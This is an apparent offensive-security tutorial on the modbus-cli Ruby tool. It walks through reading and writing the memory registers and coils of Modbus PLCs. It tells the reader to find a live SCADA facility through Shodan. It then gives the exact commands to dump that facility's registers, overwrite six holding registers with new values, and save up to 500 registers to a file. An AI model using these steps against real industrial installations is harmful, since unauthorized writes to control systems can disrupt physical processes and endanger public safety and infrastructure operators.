modbus-cli
Last updated
Last updated
This handy little Ruby tool is capable of enumerating the coils on a modbus installation as well as reading and writing to the memory registers.
gem install modbus-cli
Before we proceed, we need to take a minute to review some terminology. mosbus-cli is designed to be used with both Modicon memory terminology and Schneider Electric's proprietary memory address terminology.
modbus --help
modbus read --help
modbus write --help
modbus dump --help
Once located a functioning SCADA facility via Shodan, let's try reading some of the values from that facility.
First, let's try using the Schneider Electric terminology. Schneider Electric using %MW to designate a word in memory. Let's read the first 20 words from memory.
modbus read <IP address> %MW100 20
We can read the same registers using the Modicon terminology
modbus read <IP address> 400101 20
If we want to read the double words, we can use Schneider's %MD terminology
modbus read <IP address> %MD100 20
Next, if we want to read the coils (remember, coils are either energized or not, so that values are either 0 or 1), we can use Schneider Electric terminology for coils, %M.
We can also read the same coils using Modicon terminology (1-99999).
Now that we have seen how we can read the values from a modbus PLC enabled site, now let's see if we can write values to the site. Remember, modbus devices have at least two areas that we might be able to write to, the coils and the registers.
Let's see whether we can enter the value 2 in the six registers starting with 400101. To do so, we would enter;
modbus write <IP address> 400101 2 2 2 2 2 2
Now that we have written to those six registers, let's go back and read those same registers and see whether we have changed the values.
modbus read <IPaddress> 400101 20
modbus read --output datacapture.txt <IP address> 400101 500